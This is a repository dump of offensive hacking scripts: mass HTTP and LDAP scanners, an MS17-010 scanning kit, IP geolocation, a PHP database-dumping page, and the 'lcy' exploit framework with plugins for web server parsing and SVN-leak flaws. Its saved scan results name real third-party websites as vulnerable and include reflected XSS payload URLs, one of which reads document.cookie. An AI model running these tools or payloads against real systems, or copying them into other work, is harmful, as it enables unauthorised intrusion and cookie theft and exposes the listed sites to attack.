-------------------------------------------------------------------------------- /git-all-secrets-master/thog/truffleHog/__init__.py: -------------------------------------------------------------------------------- 1 | from truffleHog import find_strings 2 | -------------------------------------------------------------------------------- /httpscan.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | # Author: Zeroh 3 | 4 | import re 5 | import sys 6 | import Queue 7 | import threading 8 | import optparse 9 | import requests 10 | from IPy import IP 11 | 12 | printLock = threading.Semaphore(1) #lock Screen print 13 | TimeOut = 5 #request timeout 14 | 15 | #User-Agent 16 | header = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36','Connection':'close'} 17 | 18 | class scan(): 19 | 20 | def __init__(self,cidr,threads_num): 21 | self.threads_num = threads_num 22 | self.cidr = IP(cidr) 23 | #build ip queue 24 | self.IPs = Queue.Queue() 25 | for ip in self.cidr: 26 | ip = str(ip) 27 | self.IPs.put(ip) 28 | 29 | def request(self): 30 | with threading.Lock(): 31 | while self.IPs.qsize() > 0: 32 | ip = self.IPs.get() 33 | try: 34 | r = requests.Session().get('http://'+str(ip),headers=header,timeout=TimeOut) 35 | status = r.status_code 36 | title = re.search(r'(.*)', r.text) #get the title 37 | if title: 38 | title = title.group(1).strip().strip("\r").strip("\n")[:30] 39 | else: 40 | title = "None" 41 | banner = '' 42 | try: 43 | banner += r.headers['Server'][:20] #get the server banner 44 | except:pass 45 | printLock.acquire() 46 | print "|%-16s|%-6s|%-20s|%-30s|" % (ip,status,banner,title) 47 | print "+----------------+------+--------------------+------------------------------+" 48 | 49 | #Save log 50 | with open("./log/"+self.cidr.strNormal(3)+".log",'a') as f: 51 | f.write(ip+"\n") 52 | 53 | except Exception,e: 54 | printLock.acquire() 55 | 
finally: 56 | printLock.release() 57 | 58 | #Multi thread 59 | def run(self): 60 | for i in range(self.threads_num): 61 | t = threading.Thread(target=self.request) 62 | t.start() 63 | 64 | if __name__ == "__main__": 65 | parser = optparse.OptionParser("Usage: %prog [options] target") 66 | parser.add_option("-t", "--thread", dest = "threads_num", 67 | default = 1, type = "int", 68 | help = "[optional]number of theads,default=10") 69 | (options, args) = parser.parse_args() 70 | if len(args) < 1: 71 | parser.print_help() 72 | sys.exit(0) 73 | 74 | print "+----------------+------+--------------------+------------------------------+" 75 | print "| IP |Status| Server | Title |" 76 | print "+----------------+------+--------------------+------------------------------+" 77 | 78 | s = scan(cidr=args[0],threads_num=options.threads_num) 79 | s.run() 80 | -------------------------------------------------------------------------------- /ip-location/README.md: -------------------------------------------------------------------------------- 1 | # ip-location 2 | 高精度IP地址定位 3 | -------------------------------------------------------------------------------- /ip地址精准定位.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | # author:allen权 3 | import sys 4 | import urllib2 5 | import json 6 | 7 | def get_ip_information(ip): 8 | url='http://api.map.baidu.com/highacciploc/v1?qcip='+ip+'&qterm=pc&ak='你的密钥(AK)'&coord=bd09ll&extensions=3' 9 | poiss='' 10 | request = urllib2.Request(url) 11 | page = urllib2.urlopen(request, timeout=10) 12 | data_json = page.read() 13 | data_dic = json.loads(data_json) 14 | if(data_dic.has_key("content")): 15 | content=data_dic["content"] 16 | address_component=content["address_component"] 17 | formatted_address=content["formatted_address"] 18 | print "该IP地址的具体位置为:" 19 | print address_component["country"] 20 | print formatted_address 21 | if (content.has_key("pois")): 22 | print "该IP地址附近POI信息如下:" 23 
| pois = content["pois"] 24 | for index in range(len(pois)): 25 | pois_name = pois[index]["name"] 26 | pois_address = pois[index]["address"] 27 | print pois_name, pois_address 28 | else: 29 | print 'IP地址定位失败!!!' 30 | if __name__ == '__main__': 31 | get_ip_information('183.55.116.95') -------------------------------------------------------------------------------- /ip物理地址定位.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ip物理地址定位.py -------------------------------------------------------------------------------- /kali-tools-master/.gitignore: -------------------------------------------------------------------------------- 1 | **/dist/ 2 | **/__pycache__/ 3 | -------------------------------------------------------------------------------- /kali-tools-master/LICENCE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) [year] [fullname] 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /kali-tools-master/README.md: -------------------------------------------------------------------------------- 1 | # Kali Tools 2 | 3 | This script lets you run **all kali tools** on any Linux distribution. More specifically, it allows cloning the source repo of the packages (and automatically installing them if needed), per package, as needed. 4 | 5 | Additionally, it allows **searching** for tools, a feature I was dearly missing even in Kali. Searching works on package names **and descriptions** (which were manually curated, then hardcoded in this repo to avoid unneeded network access). 6 | 7 | Inspired by [LionSec/Katoolin](https://github.com/LionSec/katoolin), but not restricted to Ubuntu/Debian. 
8 | 9 | Author: [Ludovic Barman](https://lbarman.ch) 10 | 11 | ## Demo: Search + Descriptions 12 | 13 | ![demo 1](demo1.png "Search demo on kali tools") 14 | 15 | ## Demo: Kali Menu 16 | 17 | ![demo 2](demo2.png "Menu demo on kali tools") 18 | -------------------------------------------------------------------------------- /kali-tools-master/demo1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/kali-tools-master/demo1.png -------------------------------------------------------------------------------- /kali-tools-master/demo2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/kali-tools-master/demo2.png -------------------------------------------------------------------------------- /kali-tools-master/helpers.py: -------------------------------------------------------------------------------- 1 | # test all packages names against the reference URL, shows broken links / packages 2 | def testAllURLs(): 3 | allPackages = [] 4 | for cat in data.packages: 5 | allPackages += data.packages[cat] 6 | allPackages = set(allPackages) 7 | allPackages = sorted(list(allPackages)) 8 | 9 | #get the page referencing all packages 10 | source = "" 11 | try: 12 | print("Contacting web server...") 13 | req = requests.get("http://git.kali.org/gitweb/", timeout=30) 14 | print("Done.") 15 | source = req.text 16 | except: 17 | print("Could not read git repos") 18 | sys.exit(1) 19 | 20 | #for each package, check if in page 21 | for p in allPackages: 22 | if p not in data.specialGitURL: 23 | fullPath = "packages/"+p+".git" 24 | if p not in source: 25 | print("Error", p, "@", fullPath, "not found.") 26 | 27 | 28 | # fetches the links to get the full description of the pacakge 29 | def fetchPackageLinks(): 30 | d = 
requests.get("http://tools.kali.org/tools-listing") 31 | rawHtml = d.text 32 | soup = BeautifulSoup(rawHtml, 'html.parser') 33 | links = {} 34 | for link in soup.find_all('a'): 35 | if "") != -1: 31 | self.result['status'] = False 32 | return False 33 | flag = False 34 | for word in keyword: 35 | if word in content: 36 | self.result['status'] = True 37 | break 38 | self.result['info'] = "存在Svn泄露漏洞,验证url: %s" % (vul_url,vul_url) -------------------------------------------------------------------------------- /lcy/exploits/website/svn_information_disclosure.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/exploits/website/svn_information_disclosure.pyc -------------------------------------------------------------------------------- /lcy/exploits/website/webserver_Parsing_vulnerability.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Author: Lcy 4 | # @Date: 2016-09-20 15:34:41 5 | # @Last Modified by: Lcy 6 | # @Last Modified time: 2016-09-21 17:24:52 7 | import urllib2 8 | class Exploit: 9 | def __init__(self,target,expfile): 10 | self.target = target 11 | self.result = { 12 | "name": "IIS7 NGINX 解析漏洞", 13 | "author": "Lcy", 14 | "type": "website", 15 | "ref": "https://phpinfo.me", 16 | "status":False, 17 | "info":"", 18 | 'filename':expfile + ".py", 19 | "target":target, 20 | } 21 | def verify(self): 22 | file_path = "/robots.txt/.php" 23 | try: 24 | file_url = self.target+file_path 25 | req = urllib2.Request(file_url) 26 | res = urllib2.urlopen(req,timeout=3) 27 | content = res.read() 28 | if res.getcode() == 200: 29 | if content.find("<") != -1: 30 | return False 31 | self.result['status'] = True 32 | self.result["info"] = "目标 {url} 存在解析漏洞 验证url:{verify_url}".format( 33 | url = self.target, 34 | verify_url=file_url 35 | ) 36 | except 
Exception,e: 37 | pass 38 | -------------------------------------------------------------------------------- /lcy/exploits/website/webserver_Parsing_vulnerability.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/exploits/website/webserver_Parsing_vulnerability.pyc -------------------------------------------------------------------------------- /lcy/lcy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Author: Lcy 4 | # @Date: 2016-09-20 10:01:26 5 | # @Last Modified by: Lcy 6 | # @Last Modified time: 2016-09-21 11:34:31 7 | from lib.Color import * 8 | from lib.framework import * 9 | import os 10 | lcy = framework() 11 | lcy.lbanner() 12 | if __name__=='__main__': 13 | try: 14 | while True: 15 | color.cprint("lcy",GREY,0) 16 | cmd=raw_input('>') 17 | cmds = lcy.formatCmd(cmd) 18 | if(len(cmds) == 0): 19 | continue 20 | if cmds[0] == 'exit': 21 | lcy.lexit() 22 | if cmds[0] == 'banner': 23 | lcy.lbanner() 24 | elif cmds[0] == 'show': 25 | lcy.lshow(cmds[1:]) 26 | elif cmds[0] == 'set': 27 | lcy.lset(cmds[1:]) 28 | elif cmds[0] == 'exploit': 29 | lcy.lexploit(cmds[1:]) 30 | else: 31 | os.system(cmd) 32 | except KeyboardInterrupt: 33 | exit() 34 | except Exception,e: 35 | print e 36 | -------------------------------------------------------------------------------- /lcy/lib/Color.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Mst=>libs=>color 3 | ''' 4 | from os import name 5 | if name == 'nt': 6 | '''windows color table''' 7 | #global BLACK,BLUE,GREEN,CYAN,RED,PURPLE,YELLOW,WHITE,GREY 8 | BLACK = 0x0 9 | BLUE = 0x01 10 | GREEN = 0x02 11 | CYAN = 0x03 12 | RED = 0x04 13 | PURPLE= 0x05 14 | YELLOW= 0x06 15 | WHITE = 0x07 16 | GREY = 0x08 17 | else: 18 | '''other os color table''' 19 | #global 
BLACK,BLUE,GREEN,CYAN,RED,PURPLE,YELLOW,WHITE,GREY 20 | BLACK = '\033[0m' 21 | BLUE = '\033[34m' 22 | GREEN = '\033[32m' 23 | CYAN = '\033[36m' 24 | RED = '\033[31m' 25 | PURPLE= '\033[35m' 26 | YELLOW= '\033[33m' 27 | WHITE = '\033[37m' 28 | GREY = '\033[38m' 29 | wincode = """ 30 | class ntcolor: 31 | '''windows cmd color''' 32 | try: 33 | STD_INPUT_HANDLE = -10 34 | STD_OUTPUT_HANDLE= -11 35 | STD_ERROR_HANDLE = -12 36 | import ctypes 37 | std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE) 38 | def set_cmd_text_color(self,color, handle=std_out_handle): 39 | '''set color''' 40 | bool = self.ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color) 41 | return bool 42 | def resetColor(self): 43 | '''reset color''' 44 | self.set_cmd_text_color(RED|GREEN|BLUE) 45 | def cprint(self,msg,color=BLACK,enter=1): 46 | '''print color message''' 47 | self.set_cmd_text_color(color|color|color) 48 | if enter == 1: 49 | print msg 50 | else: 51 | print msg, 52 | self.resetColor() 53 | except: 54 | pass 55 | """ 56 | otcode = """ 57 | class otcolor: 58 | '''other os terminal color''' 59 | def cprint(self,msg,color=BLACK,enter=1): 60 | '''print color message''' 61 | if enter == 1: 62 | print color+msg+BLACK 63 | else: 64 | print color+msg+BLACK, 65 | """ 66 | if __name__ == '__main__': 67 | print __doc__ 68 | else: 69 | if name == 'nt': 70 | exec(wincode) 71 | color = ntcolor() 72 | else: 73 | exec(otcode) 74 | color = otcolor() 75 | -------------------------------------------------------------------------------- /lcy/lib/Color.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/lib/Color.pyc -------------------------------------------------------------------------------- /lcy/lib/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 
-*- 3 | # @Author: Lcy 4 | # @Date: 2016-09-20 10:13:59 5 | # @Last Modified by: Lcy 6 | # @Last Modified time: 2016-09-20 10:14:00 7 | -------------------------------------------------------------------------------- /lcy/lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/lib/__init__.pyc -------------------------------------------------------------------------------- /lcy/lib/consle_width.py: -------------------------------------------------------------------------------- 1 | """ getTerminalSize() 2 | - get width and height of console 3 | - works on linux,os x,windows,cygwin(windows) 4 | """ 5 | 6 | __all__=['getTerminalSize'] 7 | 8 | 9 | def getTerminalSize(): 10 | import platform 11 | current_os = platform.system() 12 | tuple_xy=None 13 | if current_os == 'Windows': 14 | tuple_xy = _getTerminalSize_windows() 15 | if tuple_xy is None: 16 | tuple_xy = _getTerminalSize_tput() 17 | # needed for window's python in cygwin's xterm! 
18 | if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'): 19 | tuple_xy = _getTerminalSize_linux() 20 | if tuple_xy is None: 21 | print "default" 22 | tuple_xy = (80, 25) # default value 23 | return tuple_xy 24 | 25 | def _getTerminalSize_windows(): 26 | res=None 27 | try: 28 | from ctypes import windll, create_string_buffer 29 | 30 | # stdin handle is -10 31 | # stdout handle is -11 32 | # stderr handle is -12 33 | 34 | h = windll.kernel32.GetStdHandle(-12) 35 | csbi = create_string_buffer(22) 36 | res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi) 37 | except: 38 | return None 39 | if res: 40 | import struct 41 | (bufx, bufy, curx, cury, wattr, 42 | left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw) 43 | sizex = right - left + 1 44 | sizey = bottom - top + 1 45 | return sizex, sizey 46 | else: 47 | return None 48 | 49 | def _getTerminalSize_tput(): 50 | # get terminal width 51 | # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window 52 | try: 53 | import subprocess 54 | proc=subprocess.Popen(["tput", "cols"],stdin=subprocess.PIPE,stdout=subprocess.PIPE) 55 | output=proc.communicate(input=None) 56 | cols=int(output[0]) 57 | proc=subprocess.Popen(["tput", "lines"],stdin=subprocess.PIPE,stdout=subprocess.PIPE) 58 | output=proc.communicate(input=None) 59 | rows=int(output[0]) 60 | return (cols,rows) 61 | except: 62 | return None 63 | 64 | 65 | def _getTerminalSize_linux(): 66 | def ioctl_GWINSZ(fd): 67 | try: 68 | import fcntl, termios, struct, os 69 | cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,'1234')) 70 | except: 71 | return None 72 | return cr 73 | cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2) 74 | if not cr: 75 | try: 76 | fd = os.open(os.ctermid(), os.O_RDONLY) 77 | cr = ioctl_GWINSZ(fd) 78 | os.close(fd) 79 | except: 80 | pass 81 | if not cr: 82 | try: 83 | cr = (env['LINES'], env['COLUMNS']) 84 | except: 85 | return 
None 86 | return int(cr[1]), int(cr[0]) 87 | 88 | if __name__ == "__main__": 89 | sizex,sizey=getTerminalSize() 90 | print 'width =',sizex,'height =',sizey -------------------------------------------------------------------------------- /lcy/lib/consle_width.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/lib/consle_width.pyc -------------------------------------------------------------------------------- /lcy/lib/framework.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/lib/framework.pyc -------------------------------------------------------------------------------- /lcy/lib/util.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Author: Lcy 4 | # @Date: 2016-09-20 13:46:52 5 | # @Last Modified by: Lcy 6 | # @Last Modified time: 2016-09-21 12:59:35 7 | import os 8 | from socket import gethostbyname 9 | from urlparse import urlsplit 10 | def getWebsiteExp(): 11 | path = os.path.split(os.path.realpath(__file__))[0].replace('lib','') 12 | exps = os.listdir(path + '/exploits/website/') 13 | fil = lambda str:(True, False)[str[-3:] == 'pyc' or str.find('__init__.py') != -1] 14 | return filter(fil, exps) 15 | 16 | def getServerExp(): 17 | path = os.path.split(os.path.realpath(__file__))[0].replace('lib','') 18 | exps = os.listdir(path+ '/exploits/server/') 19 | fil = lambda str:(True, False)[str[-3:] == 'pyc' or str.find('__init__.py') != -1] 20 | return filter(fil, exps) 21 | #生成扫描结果 22 | def saveHead(filename): 23 | head = ''' 24 | 25 | 26 | 27 | 28 | LcyScan 29 | 30 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | ''' 55 | f = open(filename,"a") 56 | f.write(head) 57 | f.close 58 
| def saveFoot(filename): 59 | head = ''' 60 | 61 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    62 | 63 | 64 | ''' 65 | f = open(filename,"a") 66 | f.write(head) 67 | f.close 68 | def saveResult(filename,result): 69 | html = "" 70 | html += '' + result['target'] + '' 71 | html += '' + result['filename'] + '' 72 | html += '' + result['name'] + '' 73 | html += '' + result['ref'] + '' 74 | html += '' + result['info'] + '' 75 | html += '' + result['type'] + '' 76 | html += '' 77 | f = open(filename,"a") 78 | f.write(html) 79 | f.close() 80 | def url2ip(url): 81 | """ 82 | works like turning 'http://baidu.com' => '180.149.132.47' 83 | """ 84 | iport = urlsplit(url)[1].split(':') 85 | if len(iport) > 1: 86 | return gethostbyname(iport[0]), iport[1] 87 | return gethostbyname(iport[0]) 88 | -------------------------------------------------------------------------------- /lcy/lib/util.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/lib/util.pyc -------------------------------------------------------------------------------- /lcy/lib/work.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Author: Lcy 4 | # @Date: 2016-09-20 14:52:30 5 | # @Last Modified by: Lcy 6 | # @Last Modified time: 2016-09-21 12:48:21 7 | import threading 8 | import sys 9 | from util import saveResult 10 | from Color import * 11 | from consle_width import getTerminalSize 12 | class Work(): 13 | def __init__(self,type,tnum,que=None,targets=None,filename=None): 14 | sys.path.append('exploits/server') 15 | sys.path.append('exploits/website') 16 | self.type=type 17 | self.tnum = int(tnum) 18 | self.que = que 19 | self.targets = targets 20 | self.filename = filename 21 | self.lock = threading.Lock() 22 | self.console_width = getTerminalSize()[0] - 2 23 | def start(self): 24 | ts = [] 25 | for i in range(self.tnum): 26 | t = threading.Thread(target=self.works) 27 | 
t.setDaemon(True) 28 | ts.append(t) 29 | t.start() 30 | for t in ts: 31 | t.join() 32 | def works(self): 33 | while self.que.qsize() > 0: 34 | exp = self.que.get() 35 | m = __import__(exp[:-3]) 36 | myplugin = getattr(m, "Exploit") 37 | for target in self.targets: 38 | msg = 'Scaning target:%s' % target 39 | sys.stdout.write(msg + ' ' * (self.console_width -len(msg)) + '\r') 40 | try: 41 | p = myplugin(target,exp) 42 | p.verify() 43 | result = p.result 44 | if result['status']: 45 | self.lock.acquire() 46 | color.cprint("[+] {target} | {file}".format(target=result['target'],file=exp),CYAN) 47 | self.lock.release() 48 | saveResult(self.filename,result) 49 | except Exception,e: 50 | #print e 51 | pass 52 | 53 | -------------------------------------------------------------------------------- /lcy/lib/work.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/lib/work.pyc -------------------------------------------------------------------------------- /lcy/result/20160921_25872.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    35 | 36 | 37 | -------------------------------------------------------------------------------- /lcy/result/20160921_3030.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /lcy/result/20160921_35187.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    http://www.shlst.cn/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.shlst.cn/存在dedecms swfupload反射xss,验证url:http://www.shlst.cn//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://chinasolarbolt.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://chinasolarbolt.com/存在dedecms swfupload反射xss,验证url:http://chinasolarbolt.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.11250.net/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.11250.net/存在dedecms swfupload反射xss,验证url:http://www.11250.net//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.shanghainanke.cn/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.shanghainanke.cn/存在dedecms swfupload反射xss,验证url:http://www.shanghainanke.cn//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.22266666.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.22266666.com/存在dedecms swfupload反射xss,验证url:http://www.22266666.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://gshqdygjzx.com/webserver_Parsing_vulnerability.py.pyIIS7 NGINX 解析漏洞https://phpinfo.me目标 http://gshqdygjzx.com/ 存在解析漏洞 验证url:http://gshqdygjzx.com//robots.txt/.phpwebsite
    http://www.jcjdwjy.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.jcjdwjy.com/存在dedecms swfupload反射xss,验证url:http://www.jcjdwjy.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.furuige.cn/Disucz3_flvplayer_swf_xss.py.pydiscuz X3.0 /static/image/common/flvplayer 反射XSShttps://phpinfo.mehttp://www.furuige.cn/目标存在flash反射型xss,验证地址:http://www.furuige.cn//static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(document.cookie);website
    http://www.28zqw.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.28zqw.com/存在dedecms swfupload反射xss,验证url:http://www.28zqw.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.201552.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.201552.com/存在dedecms swfupload反射xss,验证url:http://www.201552.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    http://gshqdygjzx.com/webserver_Parsing_vulnerability.py.pyIIS7 NGINX 解析漏洞https://phpinfo.me目标 http://gshqdygjzx.com/ 存在解析漏洞 验证url:http://gshqdygjzx.com//robots.txt/.phpwebsite
    35 | 36 | 37 | -------------------------------------------------------------------------------- /lcy/result/20160921_4838.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /lcy/result/20160921_74289.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    35 | 36 | 37 | -------------------------------------------------------------------------------- /lcy/result/20160921_76544.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    35 | 36 | 37 | -------------------------------------------------------------------------------- /lcy/result/20160921_84164.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /ldap匿名访问检测脚本.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | # [url]http://ldap3.readthedocs.io/tutorial.html#accessing-an-ldap-server[/url] 4 | import ldap3 5 | from fileutils import FileUtils 6 | import os 7 | 8 | def verify(host): 9 | 10 | try: 11 | print host 12 | server = ldap3.Server(host, get_info=ldap3.ALL, connect_timeout=30) 13 | conn = ldap3.Connection(server, auto_bind=True) 14 | #print server 15 | if len(server.info.naming_contexts) > 0: 16 | for _ in server.info.naming_contexts: 17 | if conn.search(_, '(objectClass=inetOrgPerson)'): 18 | naming_contexts = _.encode('utf8') 19 | f = open('ldap.txt','a') 20 | f.write(host + '\n') 21 | f.close() 22 | 23 | except Exception, e: 24 | pass 25 | #print e 26 | 27 | if __name__ == '__main__': 28 | for host in FileUtils.getLines('ldap.lst'): 29 | verify(host) -------------------------------------------------------------------------------- /ms17010/IpScanResult.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ms17010/IpScanResult.txt -------------------------------------------------------------------------------- /ms17010/go.bat: -------------------------------------------------------------------------------- 1 | java -jar ms17010.jar -------------------------------------------------------------------------------- /ms17010/ip.txt: 
-------------------------------------------------------------------------------- 1 | 10.222.22.0/24 2 | 10.222.23.0/24 3 | 10.222.12.0/24 -------------------------------------------------------------------------------- /ms17010/ms.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ms17010/ms.exe -------------------------------------------------------------------------------- /ms17010/ms17010.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ms17010/ms17010.jar -------------------------------------------------------------------------------- /ms17010/readme.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ms17010/readme.txt -------------------------------------------------------------------------------- /mysql.php: -------------------------------------------------------------------------------- 1 | 所有数据库如下:"; 14 | $sql1="show databases"; 15 | $result1=mysql_query($sql1); 16 | while($rel1=mysql_fetch_array($result1)){ 17 | echo $rel1[0]." 查看表
    "; 18 | } 19 | } 20 | if(!empty($_GET['db'])){ 21 | $db=$_GET['db']; 22 | echo "当前数据库:".$db; 23 | echo "    返回上级
    "; 24 | mysql_query("use $db"); 25 | $sql2="show tables"; 26 | $result2=mysql_query($sql2); 27 | while($rel2=mysql_fetch_array($result2)){ 28 | echo "
    ".$rel2[0]."   查看数据"; 29 | } 30 | } 31 | if(!empty($_GET['tb2'])){ 32 | $db2=$_GET['db2']; 33 | $tb2=$_GET['tb2']; 34 | echo "当前数据库:".$db2.">当前表".$tb2."

    "; 35 | mysql_query("use $db2"); 36 | $sql4="select * from $tb2"; 37 | $result4=mysql_query($sql4); 38 | $count=mysql_num_fields($result4); 39 | echo "
    url存在漏洞的插件插件名称漏洞来源执行结果类型
